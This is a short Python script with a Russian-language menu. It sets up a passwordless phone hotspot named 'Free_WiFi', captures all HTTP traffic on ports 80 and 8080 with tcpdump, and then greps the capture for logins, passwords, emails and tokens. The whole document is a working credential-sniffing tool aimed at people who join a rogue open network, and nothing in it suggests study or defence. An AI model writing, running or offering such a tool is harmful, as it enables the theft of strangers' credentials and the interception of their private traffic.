import os

DATA_FOLDER = 'wifi_data'
OUTPUT_FILE = f'{DATA_FOLDER}/captured.txt'

os.makedirs(DATA_FOLDER, exist_ok=True)

print("""
╔══════════════════════════════════╗
║  📡 Wi-Fi СЛУШАТЕЛЬ             ║
║  1. Включи точку в Настройках   ║
║  2. Слушать трафик              ║
║  3. Данные                      ║
║  4. Выход                       ║
╚══════════════════════════════════╝

📱 Открой Настройки → Точка доступа
   Имя: Free_WiFi
   Пароль: (убрать)
""")

while True:
    choice = input('>>> ').strip()
    
    if choice == '2':
        print("👂 Слушаю HTTP трафик... Ctrl+C стоп")
        os.system(f'tcpdump -i any -A "tcp port 80 or tcp port 8080" >> {OUTPUT_FILE} 2>&1')
    
    elif choice == '3':
        if os.path.exists(OUTPUT_FILE):
            os.system(f'cat {OUTPUT_FILE} | grep -iE "login|password|user|pass|email|token"')
        else:
            print("📭 Нет данных")
    
    elif choice == '4':
        break
